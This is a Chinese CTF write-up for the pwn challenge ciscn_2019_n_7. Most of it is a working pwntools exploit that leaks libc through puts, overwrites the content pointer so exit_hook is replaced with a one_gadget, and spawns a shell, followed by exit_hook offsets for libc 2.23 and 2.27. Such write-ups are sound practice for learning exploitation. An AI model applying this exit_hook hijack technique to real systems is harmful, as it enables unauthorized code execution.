【exit hook】ciscn_2019_n_7
1.ida分析
- 输入666获得puts地址,计算libc偏移
- 输入name的时候,可以输入16个字节,但是只有前8个字节可用,后面8个字节是content的指针
-
2.思路
- 通过puts计算libc的偏移
- 溢出到content指针,修改为exit_hook的地址
- edit将exit_hook改为onegadget
3.exp
from pwn import *
# Connection and binaries as given in the write-up; the commented-out lines
# are the local-process / system-libc alternatives the author kept around.
p = remote('node3.buuoj.cn', 28010)
#p = process('./ciscn_2019_n_7')
# `elf` is loaded but not referenced anywhere in the visible script.
elf = ELF('./ciscn_2019_n_7')
# The puts offset used for the leak calculation comes from this libc build.
libc = ELF('./libc-2.23.so')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context.log_level = 'debug'
def get_libc_base():
    """Leak the puts() address via menu option 666 and return the libc base.

    Reads the hex digits printed after ``0x``, subtracts the ``puts`` symbol
    offset of the loaded libc, logs both values and returns the base.
    """
    p.sendlineafter('Your choice-> \n', '666')
    p.recvuntil('0x')
    leaked = p.recvuntil('\n')
    puts_addr = int(leaked, 16)  # int() ignores the trailing newline
    log.success('puts==>' + hex(puts_addr))
    base = puts_addr - libc.sym['puts']
    log.success('libc_base==>' + hex(base))
    return base
def add(name):
    """Menu option 1: create an entry of size 0x10 whose name is *name*.

    The size is sent as decimal text; *name* is sent with ``sendafter`` (no
    trailing newline) so a full 16-byte value is delivered as-is.
    NOTE(review): ``str(name)`` relies on Python 2 string semantics — under
    Python 3 a bytes payload would be sent as its ``b'...'`` repr.
    """
    size = 0x10
    p.sendlineafter('-> \n', '1')
    p.sendlineafter(': \n', str(size))
    p.sendafter(':\n', str(name))
def edit(cont):
    """Menu option 2: answer the first prompt with ``'test'`` and the second with *cont*.

    What the first prompt asks for is not visible here; ``'test'`` is the
    fixed value the original script sends.
    NOTE(review): ``str(cont)`` relies on Python 2 string semantics — under
    Python 3 a bytes value would be sent as its ``b'...'`` repr.
    """
    first_answer = 'test'
    p.sendlineafter('-> \n', '2')
    p.sendlineafter(':\n', first_answer)
    p.sendlineafter(':\n', str(cont))
def exit():
    """Send ``'a'`` at the menu prompt (the write-up uses this to exit the target).

    NOTE: this definition shadows the builtin ``exit``; the call at the end of
    the script resolves to this function, not the builtin.
    """
    choice = 'a'
    p.sendlineafter('-> \n', choice)
# Main sequence: leak, compute the two addresses, then the three menu steps.
libc_base = get_libc_base()
# Both offsets below are for the libc-2.23 build loaded above.
exit_hook = libc_base + 0x5f0040 + 3848
one = libc_base + 0xf1147  # alternative offsets noted in the original: 0xf0364, 0xf1207
# 8-byte name followed by the 8 bytes that land on the content pointer.
add('b' * 8 + p64(exit_hook))
edit(p64(one))
exit()  # the script's own exit(), not the builtin
p.interactive()
4. exit_hook的地址
# Reference values for exit_hook on the two libc builds named in the write-up;
# only one of the four assignments applies to a given target, pick accordingly.
# libc-2.23
exit_hook = libc_base + (0x5f0040 + 3848)
exit_hook = libc_base + (0x5f0040 + 3856)
# libc-2.27
exit_hook = libc_base + (0x619060 + 3840)
exit_hook = libc_base + (0x619060 + 3848)